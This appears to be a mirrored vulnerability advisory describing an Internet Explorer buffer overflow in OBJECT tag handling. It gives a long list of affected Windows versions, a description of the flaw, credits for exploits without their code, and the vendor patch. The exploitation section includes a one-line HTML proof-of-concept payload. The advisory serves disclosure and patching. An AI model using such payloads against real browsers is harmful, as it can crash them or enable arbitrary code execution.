- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
+ Microsoft Windows ME
+ Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Microsoft Internet Explorer 5.5 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windo

- 漏洞讨论

Microsoft Internet Explorer is prone to a boundary condition error when handling OBJECT tags in web pages. When a web page containing an OBJECT tag using a parameter containing excessive data is encountered by a vulnerable client, a internal memory buffer will be overrun. This could cause Internet Explorer to fail or potentially result in the execution arbitrary code in the security context of the current user.

- 漏洞利用

The following proof of concept was provided:

&lt;object type="[/x64]AAAAAAAAAAAAAAAA"&gt;Cooler Than Centra Spike&lt;/object&gt;

Exploits contributed by Alumni &lt;alumni@ok.kz&gt; (ie-object-ex.pl), and FelineMenace &lt;ash@felinemenace.org&gt; (fm-IE.tar). skape &lt;mmiller@hick.org&gt; provides an exploit for the Metasploit Framework (ie_objecttype.pm):

- 解决方案

The vendor has released a cumulative patch to address this issue:


Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 5.5 SP2

Microsoft Internet Explorer 6.0

Microsoft Internet Explorer 5.0.1 SP3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站